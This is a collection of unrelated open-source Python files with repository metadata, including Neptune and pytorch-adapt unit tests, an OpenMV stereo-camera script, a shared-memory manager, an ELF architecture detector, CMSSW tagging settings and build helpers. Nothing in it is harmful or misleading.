# # Copyright (c) 2020, Neptune Labs Sp. z o.o. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import unittest import uuid from neptune.new.exceptions import MetadataInconsistency from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock from neptune.new.internal.container_type import ContainerType from neptune.new.internal.run_structure import ContainerStructure from neptune.new.types.value import Value class TestRunStructure(unittest.TestCase): def test_get_none(self): exp = ContainerStructure[int, dict]() self.assertEqual(exp.get(["some", "path", "val"]), None) def test_get_nested_variable_fails(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val"], 3) with self.assertRaises(MetadataInconsistency): exp.get(["some", "path", "val", "nested"]) with self.assertRaises(MetadataInconsistency): exp.get(["some", "path", "val", "nested", "nested"]) def test_get_ns(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val"], 3) self.assertEqual(exp.get(["some", "path"]), {"val": 3}) def test_set(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val"], 3) self.assertEqual(exp.get(["some", "path", "val"]), 3) def test_set_nested_variable_fails(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val"], 3) with self.assertRaises(MetadataInconsistency): exp.set(["some", "path", "val", "nested"], 3) with self.assertRaises(MetadataInconsistency): exp.set(["some", "path", "val", "nested", "nested"], 3) def test_set_ns_collision(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val"], 3) with self.assertRaises(MetadataInconsistency): exp.set(["some", "path"], 5) def test_pop(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val1"], 3) exp.set(["some", "path", "val2"], 5) exp.pop(["some", "path", "val2"]) self.assertEqual(exp.get(["some", "path", "val1"]), 3) self.assertEqual(exp.get(["some", "path", "val2"]), None) self.assertTrue( "some" in exp.get_structure() and "path" in exp.get_structure()["some"] ) def test_pop_whole_ns(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val"], 3) exp.pop(["some", "path", "val"]) self.assertEqual(exp.get(["some", "path", "val"]), None) self.assertFalse("some" in exp.get_structure()) def test_pop_not_found(self): exp = ContainerStructure[int, dict]() with self.assertRaises(MetadataInconsistency): exp.pop(["some", "path"]) def test_pop_ns_fail(self): exp = ContainerStructure[int, dict]() exp.set(["some", "path", "val1"], 3) with self.assertRaises(MetadataInconsistency): exp.pop(["some", "path"]) class TestIterateSubpaths(unittest.TestCase): # pylint: disable=protected-access project_uuid = str(uuid.uuid4()) def setUp(self): self.backend = NeptuneBackendMock() exp = self.backend.create_run(self.project_uuid) # FIXME test for projects self.structure = self.backend._containers[(exp.id, ContainerType.RUN)] self.structure.set(["attributes", "float"], Value()) self.structure.set(["attributes", "node", "one"], Value()) self.structure.set(["attributes", "node", "two"], Value()) self.structure.set(["attributes", "node", "three"], Value()) self.structure.set(["attributes", "int"], Value()) self.structure.set(["attributes", "string"], Value()) def test_iterate_empty_run(self): empty_structure = ContainerStructure[Value, dict]() self.assertListEqual(list(empty_structure.iterate_subpaths([])), []) self.assertListEqual(list(empty_structure.iterate_subpaths(["test"])), []) def test_iterate_empty_prefix(self): prefix = [] expected_subpaths = [ "sys/id", "sys/state", "sys/owner", "sys/size", "sys/tags", "sys/creation_time", "sys/modification_time", "sys/failed", "attributes/float", "attributes/int", "attributes/string", "attributes/node/one", "attributes/node/two", "attributes/node/three", ] print(list(self.structure.iterate_subpaths(prefix))) self.assertListEqual( list(self.structure.iterate_subpaths(prefix)), expected_subpaths ) def test_iterate_prefix(self): prefix = ["sys"] expected_subpaths = [ "sys/id", "sys/state", "sys/owner", "sys/size", "sys/tags", "sys/creation_time", "sys/modification_time", "sys/failed", ] self.assertListEqual( list(self.structure.iterate_subpaths(prefix)), expected_subpaths ) def test_iterate_long_prefix(self): prefix = ["attributes", "node"] expected_subpaths = [ "attributes/node/one", "attributes/node/two", "attributes/node/three", ] self.assertListEqual( list(self.structure.iterate_subpaths(prefix)), expected_subpaths ) def test_iterate_nonexistent_prefix(self): prefix = ["argh"] expected_subpaths = [] self.assertListEqual( list(self.structure.iterate_subpaths(prefix)), expected_subpaths )
ProofOfConcepts/Vision/OpenMvStereoVision/src/target_code/stereo_remote_cam.py
WoodData/EndpointAI
190
12686330
import image, network, rpc, sensor, struct import time import micropython from pyb import Pin from pyb import LED # variables that can be changed save_to_SD = False sensor_format = sensor.RGB565 #sensor_format = sensor.GRAYSCALE # leds are used as an easy way to know if the remote camera has started fine red_led = LED(1) green_led = LED(2) blue_led = LED(3) ir_led = LED(4) def led_control(x): if (x&1)==0: red_led.off() elif (x&1)==1: red_led.on() if (x&2)==0: green_led.off() elif (x&2)==2: green_led.on() if (x&4)==0: blue_led.off() elif (x&4)==4: blue_led.on() if (x&8)==0: ir_led.off() elif (x&8)==8: ir_led.on() processing = True # pin to trigger the snapshot pin4 = Pin('P4', Pin.IN, Pin.PULL_UP) # communication with the controller cam interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0) # here we always choose the QVGA format (320x240) inside a VGA image #if this is changed, the camera have to calibrated again # also, the logic of mask_height should be checked img_width = 320 img_height = 240 #additionnal data for the mask height if sensor_format == sensor.RGB565: mask_height = int(img_height /8) else: mask_height = int(img_height / 4) sensor.reset() sensor_size = sensor.VGA sensor.set_pixformat(sensor_format) sensor.set_framesize(sensor_size) sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height)) # the following is not really needed, this is to do the same as the controller cam sensor.skip_frames(time = 2000) sensor.snapshot() ################################################################ # Call Backs ################################################################ def sensor_config(data): global processing gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db = struct.unpack("<fIfff", data) sensor.set_auto_gain(False, gain_db) sensor.set_auto_exposure(False, exposure_us) sensor.set_auto_whitebal(False, (r_gain_db, g_gain_db, b_gain_db)) processing = False return struct.pack("<fIfff",gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db) def raw_image_read_cb(): global processing interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout processing = False def raw_image_read(data): interface.schedule_callback(raw_image_read_cb) return bytes() def loop_callback(): global processing if not processing: raise Exception # Register call backs. interface.register_callback(raw_image_read) interface.register_callback(sensor_config) interface.setup_loop_callback(loop_callback) # a simple visual way to know the slave cam has started properly # 2 blue blinks led_control(4) time.sleep(500) led_control(0) time.sleep(500) led_control(4) time.sleep(500) led_control(0) # configuration step try: processing = True interface.loop() except: pass #stabilisation of the cam sensor.skip_frames(time=2000) # save the ref image used for the diff #print("About to save background image...") data_fb = sensor.alloc_extra_fb(img_width, img_height, sensor.RGB565) ref_img = sensor.alloc_extra_fb(img_width, img_height, sensor_format) img = sensor.snapshot() img.remap(data_fb, right=True) ref_img.replace(img) #print("Saved background image - Now frame differencing!") # now add an additionnal part that will convey the mask info sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height+ mask_height)) # serve for ever while True: try: processing = True while not pin4.value(): pass # get the image and undistort it sent_image = sensor.snapshot() sent_image.remap(data_fb, right=True) # diff it with the ref image that has also been undistorted sent_image.difference_special(ref_img, data_fb, 25, 40, 400, 2000) interface.loop() except: pass
src/api-service/__app__/timer_daily/__init__.py
tonybaloney/onefuzz
2,692
12686362
<filename>src/api-service/__app__/timer_daily/__init__.py #!/usr/bin/env python # # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. import logging import azure.functions as func from ..onefuzzlib.webhooks import WebhookMessageLog from ..onefuzzlib.workers.scalesets import Scaleset def main(mytimer: func.TimerRequest) -> None: # noqa: F841 scalesets = Scaleset.search() for scaleset in scalesets: logging.info("updating scaleset configs: %s", scaleset.scaleset_id) scaleset.needs_config_update = True scaleset.save() expired_webhook_logs = WebhookMessageLog.search_expired() for log_entry in expired_webhook_logs: logging.info( "stopping expired webhook message log: %s:%s", log_entry.webhook_id, log_entry.event_id, ) log_entry.delete()
factory-ai-vision/EdgeSolution/modules/InferenceModule/shared_memory.py
kaka-lin/azure-intelligent-edge-patterns
176
12686370
import tempfile import mmap import os import logging from exception_handler import PrintGetExceptionDetails # *********************************************************************************** # Shared memory management # class SharedMemoryManager: def __init__(self, shmFlags=None, name=None, size=None): try: self._shmFilePath = '/dev/shm' self._shmFileName = name if self._shmFileName is None: self._shmFileName = next(tempfile._get_candidate_names()) self._shmFileSize = size if self._shmFileSize is None: self._shmFileSize = 1024 * 1024 * 10 # Bytes (10MB) self._shmFileFullPath = os.path.join(self._shmFilePath, self._shmFileName) self._shmFlags = shmFlags # See the NOTE section here: https://docs.python.org/2/library/os.html#os.open for details on shmFlags if self._shmFlags is None: self._shmFile = open(self._shmFileFullPath, 'r+b') self._shm = mmap.mmap(self._shmFile.fileno(), self._shmFileSize) else: self._shmFile = os.open(self._shmFileFullPath, self._shmFlags) os.ftruncate(self._shmFile, self._shmFileSize) self._shm = mmap.mmap(self._shmFile, self._shmFileSize, mmap.MAP_SHARED, mmap.PROT_WRITE | mmap.PROT_READ) # Dictionary to host reserved mem blocks # self._mem_slots[sequenceNo] = [Begin, End] (closed interval) self._memSlots = dict() logging.info('Shared memory name: {0}'.format(self._shmFileFullPath)) except: PrintGetExceptionDetails() raise def ReadBytes(self, memorySlotOffset, memorySlotLength): try: # This is Non-Zero Copy operation # self._shm.seek(memorySlotOffset, os.SEEK_SET) # bytesRead = self._shm.read(memorySlotLength) # return bytesRead #Zero-copy version return memoryview(self._shm)[memorySlotOffset:memorySlotOffset+memorySlotLength].toreadonly() except: PrintGetExceptionDetails() raise # Returns None if no availability # Returns closed interval [Begin, End] address with available slot def GetEmptySlot(self, seqNo, sizeNeeded): address = None if sizeNeeded < 1: return address # Empty memory if len(self._memSlots) < 1: if self._shmFileSize >= sizeNeeded: self._memSlots[seqNo] = (0, sizeNeeded - 1) address = (0, sizeNeeded - 1) else: address = None else: self._memSlots = {k: v for k, v in sorted( self._memSlots.items(), key=lambda item: item[1])} # find an available memory gap = sizeNeeded prevSlotEnd = 0 for k, v in self._memSlots.items(): if (v[0] - prevSlotEnd - 1) >= sizeNeeded: address = (prevSlotEnd + 1, prevSlotEnd + sizeNeeded) self._memSlots[seqNo] = (address[0], address[1]) break else: prevSlotEnd = v[1] # no gap in between, check last possible gap if address is None: if (self._shmFileSize - prevSlotEnd + 1) >= sizeNeeded: address = (prevSlotEnd + 1, prevSlotEnd + sizeNeeded) self._memSlots[seqNo] = (address[0], address[1]) # interval [Begin, End] return address def DeleteSlot(self, seqNo): try: del self._memSlots[seqNo] return True except KeyError: return False def __del__(self): try: if self._shmFlags is None: self._shmFile.close() else: os.close(self._shmFile) except: PrintGetExceptionDetails() raise
lisa/core/architecture.py
jrespeto/LiSa
244
12686383
<gh_stars>100-1000 """ ELF architecture detection module. """ import logging.config from lisa.config import logging_config logging.config.dictConfig(logging_config) log = logging.getLogger() e_machine = { 2: 'sparc', 3: 'i386', 4: 'm68k', 8: 'mips', 18: 'sparc32plus', 20: 'ppc', 21: 'ppc64', 22: 's390x', 40: 'arm', 41: 'alpha', 42: 'sh4', 43: 'sparc64', 62: 'x86_64', 183: 'aarch64' } def get_architecture(file_path): """Gets architecture and endianness information - needed for starting guest machine and choosing proper image. :param file_path: Path to file. :returns: Tuple (arch, bit, endian) """ arch = None bit = None endian = None with open(file_path, 'rb') as f: header = f.read(32) # check ELF header 7xELF if header[:4] != b'\x7fELF': log.critical('Analyzed file has invalid ELF header.') return (None, None, None) # 32 vs 64 bit if header[4] == 1: bit = '32' elif header[4] == 2: bit = '64' # endianess if header[5] == 1: endian = 'little' elif header[5] == 2: endian = 'big' # processor architecture byte_arch = bytearray(header[18:20]) byte_arch_code = int.from_bytes(byte_arch, endian) if byte_arch_code in e_machine: arch = e_machine[byte_arch_code] return (arch, bit, endian)
tests/datasets/test_combined_source_and_target.py
KevinMusgrave/pytorch-adapt
131
12686396
import unittest import numpy as np import torch from pytorch_adapt.datasets import CombinedSourceAndTargetDataset from pytorch_adapt.utils.common_functions import join_lists class TestCombinedSourceAndTarget(unittest.TestCase): def test_combined(self): np.random.seed(3429) for target_dataset_size in [99, 199]: src_dataset_size = 117 src = torch.arange(src_dataset_size) src = [{"src_imgs": i, "src_labels": i} for i in src] tgt = torch.arange(target_dataset_size) tgt = [{"target_imgs": i} for i in tgt] d = CombinedSourceAndTargetDataset(src, tgt) collected = [] num_loops = 10000 batch_size = 64 total_len = num_loops * batch_size for x in range(num_loops): collected.append([]) for i in range(batch_size): batch = d[i] collected[x].append( (batch["src_imgs"].item(), batch["target_imgs"].item()) ) all_src = [] for c in collected: self.assertTrue([x[1] for x in c] == list(range(batch_size))) curr_src = [x[0] for x in c] # check for randomness self.assertTrue(curr_src not in all_src) all_src.append(curr_src) all_src = join_lists(all_src) self.assertTrue(len(all_src) == total_len) bincount = np.bincount(all_src) self.assertTrue(len(bincount) == src_dataset_size) ideal_bincount = total_len // src_dataset_size self.assertTrue( all(np.isclose(x, ideal_bincount, rtol=0.1) for x in bincount) )
RecoBTag/CTagging/python/training_settings.py
ckamtsikis/cmssw
852
12686398
<reponame>ckamtsikis/cmssw import FWCore.ParameterSet.Config as cms ## IMPORTANT! ## This file was automatically generated by RecoBTag/CTagging/test/dump_training_vars_cfg.py ## with input xml files: ## - C vs L: ../data/c_vs_udsg.weight.xml sha1 checksum: 1b50773894bf3c64e41694bd48bda5f6f0e3795b ## - C vs B: ../data/c_vs_b.weight.xml sha1 checksum: c342f54c6448d488e6e2b483a3a3956e34ad8ea1 c_vs_l_vars_vpset = cms.VPSet(cms.PSet( default = cms.double(-1), name = cms.string('vertexLeptonCategory'), taggingVarName = cms.string('vertexLeptonCategory') ), cms.PSet( default = cms.double(-100), idx = cms.int32(0), name = cms.string('trackSip2dSig_0'), taggingVarName = cms.string('trackSip2dSig') ), cms.PSet( default = cms.double(-100), idx = cms.int32(1), name = cms.string('trackSip2dSig_1'), taggingVarName = cms.string('trackSip2dSig') ), cms.PSet( default = cms.double(-100), idx = cms.int32(0), name = cms.string('trackSip3dSig_0'), taggingVarName = cms.string('trackSip3dSig') ), cms.PSet( default = cms.double(-100), idx = cms.int32(1), name = cms.string('trackSip3dSig_1'), taggingVarName = cms.string('trackSip3dSig') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('trackPtRel_0'), taggingVarName = cms.string('trackPtRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('trackPtRel_1'), taggingVarName = cms.string('trackPtRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('trackPPar_0'), taggingVarName = cms.string('trackPPar') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('trackPPar_1'), taggingVarName = cms.string('trackPPar') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('trackEtaRel_0'), taggingVarName = cms.string('trackEtaRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('trackEtaRel_1'), taggingVarName = cms.string('trackEtaRel') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackDeltaR_0'), taggingVarName = cms.string('trackDeltaR') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackDeltaR_1'), taggingVarName = cms.string('trackDeltaR') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackPtRatio_0'), taggingVarName = cms.string('trackPtRatio') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackPtRatio_1'), taggingVarName = cms.string('trackPtRatio') ), cms.PSet( default = cms.double(1.1), idx = cms.int32(0), name = cms.string('trackPParRatio_0'), taggingVarName = cms.string('trackPParRatio') ), cms.PSet( default = cms.double(1.1), idx = cms.int32(1), name = cms.string('trackPParRatio_1'), taggingVarName = cms.string('trackPParRatio') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackJetDist_0'), taggingVarName = cms.string('trackJetDist') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackJetDist_1'), taggingVarName = cms.string('trackJetDist') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackDecayLenVal_0'), taggingVarName = cms.string('trackDecayLenVal') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackDecayLenVal_1'), taggingVarName = cms.string('trackDecayLenVal') ), cms.PSet( default = cms.double(0), name = cms.string('jetNSecondaryVertices'), taggingVarName = cms.string('jetNSecondaryVertices') ), cms.PSet( default = cms.double(-0.1), name = cms.string('jetNTracks'), taggingVarName = cms.string('jetNTracks') ), cms.PSet( default = cms.double(-0.1), name = cms.string('trackSumJetEtRatio'), taggingVarName = cms.string('trackSumJetEtRatio') ), cms.PSet( default = cms.double(-0.1), name = cms.string('trackSumJetDeltaR'), taggingVarName = cms.string('trackSumJetDeltaR') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('vertexMass_0'), taggingVarName = cms.string('vertexMass') ), cms.PSet( default = cms.double(-10), idx = cms.int32(0), name = cms.string('vertexEnergyRatio_0'), taggingVarName = cms.string('vertexEnergyRatio') ), cms.PSet( default = cms.double(-999), idx = cms.int32(0), name = cms.string('trackSip2dSigAboveCharm_0'), taggingVarName = cms.string('trackSip2dSigAboveCharm') ), cms.PSet( default = cms.double(-999), idx = cms.int32(0), name = cms.string('trackSip3dSigAboveCharm_0'), taggingVarName = cms.string('trackSip3dSigAboveCharm') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('flightDistance2dSig_0'), taggingVarName = cms.string('flightDistance2dSig') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('flightDistance3dSig_0'), taggingVarName = cms.string('flightDistance3dSig') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('vertexJetDeltaR_0'), taggingVarName = cms.string('vertexJetDeltaR') ), cms.PSet( default = cms.double(0), idx = cms.int32(0), name = cms.string('vertexNTracks_0'), taggingVarName = cms.string('vertexNTracks') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('massVertexEnergyFraction_0'), taggingVarName = cms.string('massVertexEnergyFraction') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('vertexBoostOverSqrtJetPt_0'), taggingVarName = cms.string('vertexBoostOverSqrtJetPt') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonPtRel_0'), taggingVarName = cms.string('leptonPtRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonPtRel_1'), taggingVarName = cms.string('leptonPtRel') ), cms.PSet( default = cms.double(-10000), idx = cms.int32(0), name = cms.string('leptonSip3d_0'), taggingVarName = cms.string('leptonSip3d') ), cms.PSet( default = cms.double(-10000), idx = cms.int32(1), name = cms.string('leptonSip3d_1'), taggingVarName = cms.string('leptonSip3d') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonDeltaR_0'), taggingVarName = cms.string('leptonDeltaR') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonDeltaR_1'), taggingVarName = cms.string('leptonDeltaR') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonRatioRel_0'), taggingVarName = cms.string('leptonRatioRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonRatioRel_1'), taggingVarName = cms.string('leptonRatioRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonEtaRel_0'), taggingVarName = cms.string('leptonEtaRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonEtaRel_1'), taggingVarName = cms.string('leptonEtaRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonRatio_0'), taggingVarName = cms.string('leptonRatio') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonRatio_1'), taggingVarName = cms.string('leptonRatio') )) c_vs_b_vars_vpset = cms.VPSet(cms.PSet( default = cms.double(-1), name = cms.string('vertexLeptonCategory'), taggingVarName = cms.string('vertexLeptonCategory') ), cms.PSet( default = cms.double(-100), idx = cms.int32(0), name = cms.string('trackSip2dSig_0'), taggingVarName = cms.string('trackSip2dSig') ), cms.PSet( default = cms.double(-100), idx = cms.int32(1), name = cms.string('trackSip2dSig_1'), taggingVarName = cms.string('trackSip2dSig') ), cms.PSet( default = cms.double(-100), idx = cms.int32(0), name = cms.string('trackSip3dSig_0'), taggingVarName = cms.string('trackSip3dSig') ), cms.PSet( default = cms.double(-100), idx = cms.int32(1), name = cms.string('trackSip3dSig_1'), taggingVarName = cms.string('trackSip3dSig') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('trackPtRel_0'), taggingVarName = cms.string('trackPtRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('trackPtRel_1'), taggingVarName = cms.string('trackPtRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('trackPPar_0'), taggingVarName = cms.string('trackPPar') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('trackPPar_1'), taggingVarName = cms.string('trackPPar') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('trackEtaRel_0'), taggingVarName = cms.string('trackEtaRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('trackEtaRel_1'), taggingVarName = cms.string('trackEtaRel') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackDeltaR_0'), taggingVarName = cms.string('trackDeltaR') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackDeltaR_1'), taggingVarName = cms.string('trackDeltaR') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackPtRatio_0'), taggingVarName = cms.string('trackPtRatio') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackPtRatio_1'), taggingVarName = cms.string('trackPtRatio') ), cms.PSet( default = cms.double(1.1), idx = cms.int32(0), name = cms.string('trackPParRatio_0'), taggingVarName = cms.string('trackPParRatio') ), cms.PSet( default = cms.double(1.1), idx = cms.int32(1), name = cms.string('trackPParRatio_1'), taggingVarName = cms.string('trackPParRatio') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackJetDist_0'), taggingVarName = cms.string('trackJetDist') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackJetDist_1'), taggingVarName = cms.string('trackJetDist') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('trackDecayLenVal_0'), taggingVarName = cms.string('trackDecayLenVal') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(1), name = cms.string('trackDecayLenVal_1'), taggingVarName = cms.string('trackDecayLenVal') ), cms.PSet( default = cms.double(0), name = cms.string('jetNSecondaryVertices'), taggingVarName = cms.string('jetNSecondaryVertices') ), cms.PSet( default = cms.double(-0.1), name = cms.string('jetNTracks'), taggingVarName = cms.string('jetNTracks') ), cms.PSet( default = cms.double(-0.1), name = cms.string('trackSumJetEtRatio'), taggingVarName = cms.string('trackSumJetEtRatio') ), cms.PSet( default = cms.double(-0.1), name = cms.string('trackSumJetDeltaR'), taggingVarName = cms.string('trackSumJetDeltaR') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('vertexMass_0'), taggingVarName = cms.string('vertexMass') ), cms.PSet( default = cms.double(-10), idx = cms.int32(0), name = cms.string('vertexEnergyRatio_0'), taggingVarName = cms.string('vertexEnergyRatio') ), cms.PSet( default = cms.double(-999), idx = cms.int32(0), name = cms.string('trackSip2dSigAboveCharm_0'), taggingVarName = cms.string('trackSip2dSigAboveCharm') ), cms.PSet( default = cms.double(-999), idx = cms.int32(0), name = cms.string('trackSip3dSigAboveCharm_0'), taggingVarName = cms.string('trackSip3dSigAboveCharm') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('flightDistance2dSig_0'), taggingVarName = cms.string('flightDistance2dSig') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('flightDistance3dSig_0'), taggingVarName = cms.string('flightDistance3dSig') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('vertexJetDeltaR_0'), taggingVarName = cms.string('vertexJetDeltaR') ), cms.PSet( default = cms.double(0), idx = cms.int32(0), name = cms.string('vertexNTracks_0'), taggingVarName = cms.string('vertexNTracks') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('massVertexEnergyFraction_0'), taggingVarName = cms.string('massVertexEnergyFraction') ), cms.PSet( default = cms.double(-0.1), idx = cms.int32(0), name = cms.string('vertexBoostOverSqrtJetPt_0'), taggingVarName = cms.string('vertexBoostOverSqrtJetPt') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonPtRel_0'), taggingVarName = cms.string('leptonPtRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonPtRel_1'), taggingVarName = cms.string('leptonPtRel') ), cms.PSet( default = cms.double(-10000), idx = cms.int32(0), name = cms.string('leptonSip3d_0'), taggingVarName = cms.string('leptonSip3d') ), cms.PSet( default = cms.double(-10000), idx = cms.int32(1), name = cms.string('leptonSip3d_1'), taggingVarName = cms.string('leptonSip3d') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonDeltaR_0'), taggingVarName = cms.string('leptonDeltaR') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonDeltaR_1'), taggingVarName = cms.string('leptonDeltaR') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonRatioRel_0'), taggingVarName = cms.string('leptonRatioRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonRatioRel_1'), taggingVarName = cms.string('leptonRatioRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonEtaRel_0'), taggingVarName = cms.string('leptonEtaRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonEtaRel_1'), taggingVarName = cms.string('leptonEtaRel') ), cms.PSet( default = cms.double(-1), idx = cms.int32(0), name = cms.string('leptonRatio_0'), taggingVarName = cms.string('leptonRatio') ), cms.PSet( default = cms.double(-1), idx = cms.int32(1), name = cms.string('leptonRatio_1'), taggingVarName = cms.string('leptonRatio') ))
buildchain/buildchain/utils.py
SaintLoong/metalk8s
255
12686400
# coding: utf-8 """Miscellaneous helpers.""" import inspect import subprocess import sys from pathlib import Path from typing import Any, Callable, Iterator, List, Optional from docker.types import Mount # type: ignore from buildchain import config from buildchain import constants from buildchain import types def export_only_tasks(module_name: str) -> List[str]: """Return the list of tasks defined in the specified module. Arguments: module_name: name of the module Returns: The name of all the task-creator defined in this module. """ return [ name for name, _ in inspect.getmembers(sys.modules[module_name], inspect.isfunction) if name.startswith("task_") ] def build_relpath(path: Path) -> Path: """Return the given path, but relative to the build root. Arguments: path: an absolute path inside the build directory Returns: The same path, but relative to the build directory. Examples: >>> build_relpath(Path('/home/foo/metalk8s/_build/metalk8s.iso')) PosixPath('_build/metalk8s.iso') """ return path.relative_to(config.BUILD_ROOT.parent) def title_with_target1(command: str) -> Callable[[types.Task], str]: """Return a title with the command suffixed with the first target. Arguments: command: name of the command task: a doit task Returns: A function that returns the title """ def title(task: types.Task) -> str: return "{cmd: <{width}} {path}".format( cmd=command, width=constants.CMD_WIDTH, path=build_relpath(Path(task.targets[0])), ) return title def title_with_subtask_name(command: str) -> Callable[[types.Task], str]: """Return a title with the command suffixed with the sub-task name. Arguments: command: name of the command task: a doit task Returns: A function that returns the title """ def title(task: types.Task) -> str: # Extract the sub-task name (the part after `:`) from the task name. return "{cmd: <{width}} {name}".format( cmd=command, width=constants.CMD_WIDTH, name=task.name.split(":")[1] ) return title def bind_mount(source: Path, target: Path, **kwargs: Any) -> Mount: """Return a Docker mount object. Arguments: source: the host path to be mounted target: the container path the source should be mounted to Keyword arguments: Passed through to the underlying docker.services.Mount object initialization """ return Mount(source=str(source), target=str(target), type="bind", **kwargs) def bind_ro_mount(source: Path, target: Path) -> Mount: """Return *read-only* Docker mount object. Arguments: source: the host path to be mounted target: the container path the source should be mounted to """ return bind_mount(source=source, target=target, read_only=True) def git_ls(directory: Optional[str] = None) -> Iterator[Path]: """Return the list of files tracked by Git under `root` (recursively). Arguments: directory: directory to list (relative to the root of the repo). Returns: A list of files tracked by Git. """ root = constants.ROOT if directory is None else constants.ROOT / directory assert root.is_dir() return map( Path, subprocess.check_output( ["git", "ls-files", "-z", root], encoding="utf-8" ).split("\x00")[:-1], ) # `:-1` to skip the last element (empty string). def unlink_if_exist(filepath: Path) -> None: """Delete a file if it exists.""" try: filepath.unlink() except FileNotFoundError: pass
third_party/blink/tools/diff_wpt_results_unittest.py
iridium-browser/iridium-browser
575
12686420
